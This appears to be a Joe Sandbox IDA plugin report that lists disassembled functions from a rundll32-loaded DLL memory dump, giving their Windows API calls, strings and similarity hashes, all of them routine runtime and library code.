Uniqueness Score: -1.00%

Function 615B0AC0, Relevance: 10.8, APIs: 7, Instructions: 267COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(615F1478,3F3F20BC), ref: 615B0B1D
GetModuleFileNameW.KERNEL32(?,00000104), ref: 615B0BA4
LoadTypeLib.OLEAUT32(?,00000000), ref: 615B0BD5
LoadRegTypeLib.OLEAUT32(615E9538,00000000,00000000,?,00000000), ref: 615B0BFD
EnterCriticalSection.KERNEL32(615F1494), ref: 615B0DC0
LeaveCriticalSection.KERNEL32(615F1494), ref: 615B0DD6

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterLoadType$FileLeaveModuleName
String ID:
API String ID: 1976781235-0
Opcode ID: 462017802c53819842b1d13bb40bc73d0929dc0579a3a0e058beed7d9fb0fc2d
Instruction ID: 9a84aa0a934ffe3b5825b044675b23e7a2b09798c305263fb4590cd6dccf1846
Opcode Fuzzy Hash: 462017802c53819842b1d13bb40bc73d0929dc0579a3a0e058beed7d9fb0fc2d
Instruction Fuzzy Hash: 1BB15D749012199FDB11CBA4C958B9EFBB4AF49304F1584DAE815EB240DB75EE84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 615D49E1, Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 615D4A50
_free.LIBCMT ref: 615D4A5E
_free.LIBCMT ref: 615D4B8C
_free.LIBCMT ref: 615D4B97

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1ce55c6afdbaa02fdb8d5ed4487b4115595005d5bf50a06bd4afcd130d9b7b67
Instruction ID: f9b7a042f9a242d1431333580a7b022f848b556934ff3e2ee96c9d3e3a30ba9b
Opcode Fuzzy Hash: 1ce55c6afdbaa02fdb8d5ed4487b4115595005d5bf50a06bd4afcd130d9b7b67
Instruction Fuzzy Hash: 4761F572D04206AFEF10CFA8C840B9EFBF5EF85724F1584AAE954EB240D7709D418B94

Uniqueness

Uniqueness Score: -1.00%

Function 615B3DA0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 196COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(615A0000,?,00000104), ref: 615B3E7D
GetModuleHandleW.KERNEL32(00000000), ref: 615B3EF7

Strings

Module, xrefs: 615B3FA2
Module_Raw, xrefs: 615B3FD3
REGISTRY, xrefs: 615B4030
APPID, xrefs: 615B3E3D

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: Module$FileHandleName
String ID: APPID$Module$Module_Raw$REGISTRY
API String ID: 4146042529-2529269209
Opcode ID: 70d24b2bd44d65415153e317196d5e4ee5b7033bb1919611805ba433c71c4d95
Instruction ID: 73e002b98d565eda27a56a8648cc480e4c1785fa02126a5f73291494a5081776
Opcode Fuzzy Hash: 70d24b2bd44d65415153e317196d5e4ee5b7033bb1919611805ba433c71c4d95
Instruction Fuzzy Hash: 1671C235A002198BDB64CF54DC64BEEF7B4EF85714F0085A9D81AA7680EB74AE84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 615B03B0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(615A0000,?,00000104), ref: 615B048D
GetModuleHandleW.KERNEL32(00000000), ref: 615B0507

Strings

Module, xrefs: 615B05B2
Module_Raw, xrefs: 615B05DF
REGISTRY, xrefs: 615B063D
APPID, xrefs: 615B044D

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: Module$FileHandleName
String ID: APPID$Module$Module_Raw$REGISTRY
API String ID: 4146042529-2529269209
Opcode ID: 036f3efe3da29fbd6e05f512b60fcfa578c4f3fbccbcaa6f3e7e8fcb03a51a1d
Instruction ID: 0c4539f8abd3082e8127b7d77e69014e0e8b103de2294cf2510e787f824d160e
Opcode Fuzzy Hash: 036f3efe3da29fbd6e05f512b60fcfa578c4f3fbccbcaa6f3e7e8fcb03a51a1d
Instruction Fuzzy Hash: 6761B335A002198BDB24CF50DD64BEEF7B4EF85714F0085AED81AE7680EB749E84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 615CFABC, Relevance: 10.7, APIs: 7, Instructions: 160fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,615D024E,?,?,?,?,?), ref: 615CFAFE
__fassign.LIBCMT ref: 615CFB80
__fassign.LIBCMT ref: 615CFB9F
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 615CFBCC
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,615D024E), ref: 615CFBEB
WriteFile.KERNEL32(?,?,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,615D024E), ref: 615CFC24

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: b815cc6916f831c526163570d2fbc00f09faa0b2bce68225433d96b1beaffa2c
Instruction ID: 33d7aa38c3b718d12417b7ffd2234ae4c030bde487ffce9db19e6f06756ddbf8
Opcode Fuzzy Hash: b815cc6916f831c526163570d2fbc00f09faa0b2bce68225433d96b1beaffa2c
Instruction Fuzzy Hash: 6B517D70A042499FDB00CFE8D890AEEFBF8EF0A714F15851BE965E7240D7309941CB61

Uniqueness

Uniqueness Score: -1.00%

Function 615B8680, Relevance: 10.6, APIs: 7, Instructions: 106COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,3F3F20BC,?,00000000,?,00000000,8007000E), ref: 615B86F3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 615B872A

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 4315f9968951c83eebbd80d65484638dcfeabe1a2be4790e83ebfcdc52b6ac13
Instruction ID: 5f3535ed04086fd67f290b9feb023396d005b925fd6a907228c41b0bb4b6b785
Opcode Fuzzy Hash: 4315f9968951c83eebbd80d65484638dcfeabe1a2be4790e83ebfcdc52b6ac13
Instruction Fuzzy Hash: 7A312C75A0024AABDB109FA48C15FAFF7B8EB81B54F10812DF915E62C0D7729500C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 615B3380, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,00000024,00000000), ref: 615B3410
GetWindowLongW.USER32(?,000000FC), ref: 615B3424
CallWindowProcW.USER32(?,?,00000082,00000024,00000000), ref: 615B343A
GetWindowLongW.USER32(?,000000FC), ref: 615B3453
SetWindowLongW.USER32 ref: 615B3462

Strings

$, xrefs: 615B33C4

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: Window$Long$CallProc
String ID: $
API String ID: 513923721-3993045852
Opcode ID: d9d5eb7908a78a230b6152b0f701541d0706f306f3ab3291e90a4195fd81687c
Instruction ID: b219c76f78efe38330ebb6d84ffc9ec41d936ba55b1122e017c1c3ecbb347476
Opcode Fuzzy Hash: d9d5eb7908a78a230b6152b0f701541d0706f306f3ab3291e90a4195fd81687c
Instruction Fuzzy Hash: AC413975900608AFCB11DF99C884A9FFBF5FF49710F108A1DE866A7260D731A944CF90

Uniqueness

Uniqueness Score: -1.00%

Function 615AE440, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 86registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,3F3F20BC), ref: 615AE494
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 615AE4AB
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,00000000,3F3F20BC), ref: 615AE4E0
RegCloseKey.ADVAPI32(00000000), ref: 615AE4F3

Strings

Advapi32.dll, xrefs: 615AE48F
RegOpenKeyTransactedW, xrefs: 615AE4A5

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: AddressCloseHandleModuleOpenProc
String ID: Advapi32.dll$RegOpenKeyTransactedW
API String ID: 823179699-3913318428
Opcode ID: ec57e9911190162006e0f7207e2437c502e132949e6230f0c54b6fb7eb7bc375
Instruction ID: ac80884712bc18420ae5a56b3030740e735948769371577923355f373cbde2e2
Opcode Fuzzy Hash: ec57e9911190162006e0f7207e2437c502e132949e6230f0c54b6fb7eb7bc375
Instruction Fuzzy Hash: 09317171A44205AFEF14CF9AC844BAEFBB9EB49710F10C529F825E7280E774A940CB65

Uniqueness

Uniqueness Score: -1.00%

Function 615A8BF0, Relevance: 10.6, APIs: 7, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 615A8C21
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 615A8C2F
MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 615A8C44
SysFreeString.OLEAUT32(00000000), ref: 615A8C4F
VarBstrCmp.OLEAUT32(?,00000000,00000400,00000000), ref: 615A8C76
SysFreeString.OLEAUT32(00000000), ref: 615A8C83
SysFreeString.OLEAUT32 ref: 615A8CB2

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: String$Free$ByteCharMultiWide$AllocBstr
String ID:
API String ID: 1801994256-0
Opcode ID: abf350f798e2b1369c9cd3b930340dc9f20dc5a34438ba595f7df9ec1cfaa019
Instruction ID: e52ff8cefa1b149a8d130e082c86a5f4ba643b1699fc4c51e4d6cc2cae303c8c
Opcode Fuzzy Hash: abf350f798e2b1369c9cd3b930340dc9f20dc5a34438ba595f7df9ec1cfaa019
Instruction Fuzzy Hash: B6112731A81214BBDB106BA4CC58F5EFB65EB43B21F128165F631AA2C0CB7159448B95

Uniqueness

Uniqueness Score: -1.00%

Function 615A21F0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 615A221D

Part of subcall function 615B94A7: RaiseException.KERNEL32(?,?,615B6476,000000FF,00000000,00000000,FFFFFFFF,?,?,?,?,615B6476,000000FF,615ECD2C,?,000000FF), ref: 615B9507

__CxxThrowException@8.LIBVCRUNTIME ref: 615A2262
___std_exception_copy.LIBVCRUNTIME ref: 615A228F

Strings

ios_base::badbit set, xrefs: 615A2227, 615A2252, 615A2273
ios_base::failbit set, xrefs: 615A2135, 615A2231
ios_base::eofbit set, xrefs: 615A2236

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3941765731-1866435925
Opcode ID: 60f8190619ebb587ba40be45ed92510c086f1bc9adbb29ff8b808c5f18aa19df
Instruction ID: 72394afedeb1f45a239f5966e1467363932ad2933bae0c980340541c2c9d1062
Opcode Fuzzy Hash: 60f8190619ebb587ba40be45ed92510c086f1bc9adbb29ff8b808c5f18aa19df
Instruction Fuzzy Hash: 6011E7B2D507056BC710DF69C802B8EF7E8AF95310F04C91AF964DB240E775A954CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 615CDFA3, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 615CDFF9
ext-ms-, xrefs: 615CE00D

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: b20e971a6f3a3826aabd9bbc6a054666302cb5a59671215e855dcc2e783f5a80
Instruction ID: bf110418515ddcf6414894efd05591af414cf1d73a745e78dc5b8e026bd01e62
Opcode Fuzzy Hash: b20e971a6f3a3826aabd9bbc6a054666302cb5a59671215e855dcc2e783f5a80
Instruction Fuzzy Hash: 4C21DA71D41111E7DB229EEA8C81B0EFFA9DF42B60B16C519EC24F7240D670ED0187E6

Uniqueness

Uniqueness Score: -1.00%

Function 615D4EB6, Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 615D4BFD: _free.LIBCMT ref: 615D4C26

_free.LIBCMT ref: 615D4F04

Part of subcall function 615C9B98: HeapFree.KERNEL32(00000000,00000000,?,615C731A,000000FF,000000FF), ref: 615C9BAE
Part of subcall function 615C9B98: GetLastError.KERNEL32(615C6995,?,615C731A,000000FF,000000FF), ref: 615C9BC0

_free.LIBCMT ref: 615D4F0F
_free.LIBCMT ref: 615D4F1A
_free.LIBCMT ref: 615D4F6E
_free.LIBCMT ref: 615D4F79
_free.LIBCMT ref: 615D4F84
_free.LIBCMT ref: 615D4F8F

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 66e6ae1406271942d4d26fff22205feaaa92d3e50f6340eba5de2b4b63487633
Instruction ID: 7b260b08510acf3ae27d7a79a90c4d72284293caeaa97984fe3aadade231598b
Opcode Fuzzy Hash: 66e6ae1406271942d4d26fff22205feaaa92d3e50f6340eba5de2b4b63487633
Instruction Fuzzy Hash: 6E119671940B4ABAE920ABB4CC05FCBF7AC5FD070CF408859A29E66450DB36BD058751

Uniqueness

Uniqueness Score: -1.00%

Function 615C6A30, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,615C69E1,615C69A9), ref: 615C6A50
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 615C6A63
FreeLibrary.KERNEL32(00000000,?,?,?,615C69E1,615C69A9), ref: 615C6A86

Strings

mscoree.dll, xrefs: 615C6A49
;\[a, xrefs: 615C6A74
CorExitProcess, xrefs: 615C6A5B

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: ;\[a$CorExitProcess$mscoree.dll
API String ID: 4061214504-3669716609
Opcode ID: b195ac83a98b0859b85981e6f20fe11ad3bd9bb99c03224eb82636d22d5e93e5
Instruction ID: 5b2fc17e588b0d169b0c20c9dc53b43f4ea1756239474818869d61505221f151
Opcode Fuzzy Hash: b195ac83a98b0859b85981e6f20fe11ad3bd9bb99c03224eb82636d22d5e93e5
Instruction Fuzzy Hash: D8F03131910208FBDF01AFA6CC04BAEFFB5EB4A611F02C159E815A6250DB714A85CB55

Uniqueness

Uniqueness Score: -1.00%

Function 615B1810, Relevance: 9.2, APIs: 6, Instructions: 196threadCOMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 615B18BE

Part of subcall function 615B34B0: EnterCriticalSection.KERNEL32(615EFAA4,?,?), ref: 615B34FA
Part of subcall function 615B34B0: GetClassInfoExW.USER32 ref: 615B352D
Part of subcall function 615B34B0: GetClassInfoExW.USER32 ref: 615B3544
Part of subcall function 615B34B0: LeaveCriticalSection.KERNEL32(615EFAA4), ref: 615B3553

Part of subcall function 615B8508: GetProcessHeap.KERNEL32(00000008,00000008,00000000,615B3342), ref: 615B850D
Part of subcall function 615B8508: HeapAlloc.KERNEL32(00000000), ref: 615B8514

SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,?,615D9D70,000000FF), ref: 615B1909
GetCurrentThreadId.KERNEL32 ref: 615B19AE
EnterCriticalSection.KERNEL32(615EFAA4), ref: 615B19BC
LeaveCriticalSection.KERNEL32(615EFAA4), ref: 615B19D5
CreateWindowExW.USER32 ref: 615B1A0B

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: CriticalSection$ClassEnterHeapInfoLeave$AllocClientCreateCurrentErrorLastProcessRectThreadWindow
String ID:
API String ID: 859899439-0
Opcode ID: 34a61059509e2b3bb1d1066641e68f299afa33e83f9a49ab8dba5abc94f27cf9
Instruction ID: 58d552c990086e4ba0cb44e9a74171c1639024d319f59e60d1a91b37edcd277a
Opcode Fuzzy Hash: 34a61059509e2b3bb1d1066641e68f299afa33e83f9a49ab8dba5abc94f27cf9
Instruction Fuzzy Hash: DC617F75D10605AFDB04DFA9D894BAEFBB5EF89710F11C11AE815AB340E770A940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 615AEEB0, Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,00000000,?,C000008C,00000001,?,3F3F20BC,00000000,00000000), ref: 615AEEEE
CharNextW.USER32(00000000,?,?,00000000), ref: 615AEF1B
CharNextW.USER32(74ECEEF0,?,?,00000000), ref: 615AEF34
CharNextW.USER32(74ECEEF0,?,?,00000000), ref: 615AEF3F
CharNextW.USER32(00000001,?,?,00000000), ref: 615AEFAE

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 31ebc95bba4f90a9fb6ea9f5328d34da85d1a6670def27bab0863a03d905cf1a
Instruction ID: 852e164c45a9b3d8459f11ec803d68f0420b392eed3e79b02bc1258990fe2e01
Opcode Fuzzy Hash: 31ebc95bba4f90a9fb6ea9f5328d34da85d1a6670def27bab0863a03d905cf1a
Instruction Fuzzy Hash: 2A41D336A80116CFDB10DF69C48066DFBF6FF8A311BA5856AE859C7344E7319982CB90

Uniqueness

Uniqueness Score: -1.00%

Function 615A4460, Relevance: 9.1, APIs: 6, Instructions: 129COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 615A44A9
std::_Lockit::_Lockit.LIBCPMT ref: 615A44CB
std::_Lockit::~_Lockit.LIBCPMT ref: 615A44EB
__Getctype.LIBCPMT ref: 615A4587
std::_Facet_Register.LIBCPMT ref: 615A45A6
std::_Lockit::~_Lockit.LIBCPMT ref: 615A45C6

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: 295fd241bbec86f722c39dd4df96fc1976a00ee09a45efd46a2e8b78b1d33506
Instruction ID: e538fd95b7d713f435cfa1be6fd34c7dcc80dfd61f8389bb600adc2a582c7c30
Opcode Fuzzy Hash: 295fd241bbec86f722c39dd4df96fc1976a00ee09a45efd46a2e8b78b1d33506
Instruction Fuzzy Hash: C2512075D442098FCB11CF98D890A9EF7F4EF89710F19C16AD85AAB640EB30EE45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 615AE530, Relevance: 9.1, APIs: 6, Instructions: 121registryCOMMON

Download Yara Rule

APIs

Part of subcall function 615AE440: GetModuleHandleW.KERNEL32(Advapi32.dll,3F3F20BC), ref: 615AE494
Part of subcall function 615AE440: RegCloseKey.ADVAPI32(00000000), ref: 615AE4F3

RegCloseKey.ADVAPI32(?,?,?), ref: 615AE592
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 615AE5DA
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 615AE613
RegCloseKey.ADVAPI32(?), ref: 615AE628
RegCloseKey.ADVAPI32(?), ref: 615AE650
RegCloseKey.ADVAPI32(?), ref: 615AE678

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: Close$Enum$HandleModule
String ID:
API String ID: 2852649468-0
Opcode ID: 9b2ffd7560f69985ca478ef6d381e0b59b514b085a963886ce4fbf51405513c6
Instruction ID: df6929eb18ca2ec7e66987e09098ebf0ef7af08d3f7919f7faa8d302bf026c26
Opcode Fuzzy Hash: 9b2ffd7560f69985ca478ef6d381e0b59b514b085a963886ce4fbf51405513c6
Instruction Fuzzy Hash: DA416F712043059BE714DF55D854B6FFBE8EBC9354F01892EF995D7240EB30D9048BA6

Uniqueness

Uniqueness Score: -1.00%

Function 615BB2A1, Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,615B92CF,615B4EA0,615B5531,?,615B574E,?,00000001,?,?,00000001,?,615ECC28,0000000C,615B5842), ref: 615BB2AF
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 615BB2BD
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 615BB2D6
SetLastError.KERNEL32(00000000,615B574E,?,00000001,?,?,00000001,?,615ECC28,0000000C,615B5842,?,00000001,?), ref: 615BB328

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

